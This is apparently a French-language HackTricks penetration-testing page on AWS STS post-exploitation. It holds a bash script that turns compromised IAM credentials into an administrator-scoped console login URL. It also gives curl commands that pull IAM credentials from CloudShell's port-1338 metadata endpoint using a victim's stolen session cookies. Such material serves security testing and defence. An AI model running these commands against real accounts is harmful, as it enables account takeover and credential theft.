AWS - STS Post Exploitation

Support HackTricks

STS

Pour plus d'informations :

AWS - IAM, Identity Center & SSO Enum

De IAM Creds à la Console

Si vous avez réussi à obtenir des identifiants IAM, vous pourriez être intéressé par l'accès à la console web en utilisant les outils suivants. Notez que l'utilisateur/le rôle doit avoir la permission sts:GetFederationToken.

Script personnalisé

Le script suivant utilisera le profil par défaut et un emplacement AWS par défaut (ni gov ni cn) pour vous donner une URL signée que vous pouvez utiliser pour vous connecter à la console web :

# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile <prof_name>] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)

if [ $? -ne 0 ]; then
echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
exit $status
fi

# Parse the output
session_id=$(echo $output | jq -r '.Credentials.AccessKeyId')
session_key=$(echo $output | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo $output | jq -r '.Credentials.SessionToken')

# Construct the JSON credentials string
json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")

# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"

# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
--get \
--data-urlencode "Action=getSigninToken" \
--data-urlencode "SessionDuration=43200" \
--data-urlencode "Session=$json_creds"
)
signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)



# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"

aws_consoler

Vous pouvez générer un lien de console web avec https://github.com/NetSPI/aws_consoler.

cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] #This will generate a link to login into the console

Assurez-vous que l'utilisateur IAM a la permission sts:GetFederationToken, ou fournissez un rôle à assumer.

aws-vault

aws-vault est un outil pour stocker et accéder en toute sécurité aux identifiants AWS dans un environnement de développement.

aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith

Vous pouvez également utiliser aws-vault pour obtenir une session de console de navigateur

De la console aux identifiants IAM

Découvert à l'origine dans ce post, Si vous parvenez à compromettre un accès à une console web (peut-être que vous avez volé des cookies et que vous ne pouviez pas accéder au dossier .aws), vous pouvez obtenir des identifiants de jeton IAM pour cet utilisateur via CloudShell.

CloudShell expose des identifiants IAM via un point de terminaison non documenté sur le port 1338. Après avoir chargé les cookies de session de la victime dans votre navigateur, vous pouvez naviguer vers CloudShell et exécuter les commandes suivantes pour obtenir des identifiants IAM.

TOKEN=$(curl -X PUT localhost:1338/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 60")
curl localhost:1338/latest/meta-data/container/security-credentials -H "X-aws-ec2-metadata-token: $TOKEN"
Soutenir HackTricks

Last updated